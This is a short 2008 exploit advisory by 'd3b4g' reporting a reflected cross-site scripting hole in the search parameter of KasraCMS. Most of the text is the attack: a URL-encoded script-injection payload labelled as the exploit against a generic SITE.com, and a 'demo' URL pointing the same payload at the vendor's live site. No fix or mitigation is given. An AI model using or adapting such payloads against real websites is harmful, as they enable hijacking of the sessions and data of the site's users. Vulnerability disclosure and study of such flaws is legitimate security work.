++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ KasraCMS Cross Site Scripting Vulnerability Discovered by d3b4g ============================================== AUTHOR : d3b4g DATE : 26 oct 2008 EMAIL : mocking@hotlism.com ##################################################### APPLICATION : KasraCMS [~] WebSite: http://kasracms.com ======================================================= Attack details =============== The GET variable search has been set to -->alert(39841.6878520949)%3B. [+] Exploit : http://SITE.com/?search=--%3E%3CScRiPt%20%0A%0D%3Ealert(39841.6878520949)%3B%3C/ScRiPt%3E [-] Demo : http://kasracms.com/?search=--%3E%3CScRiPt%20%0A%0D%3Ealert(39841.6878520949)%3B%3C/ScRiPt%3E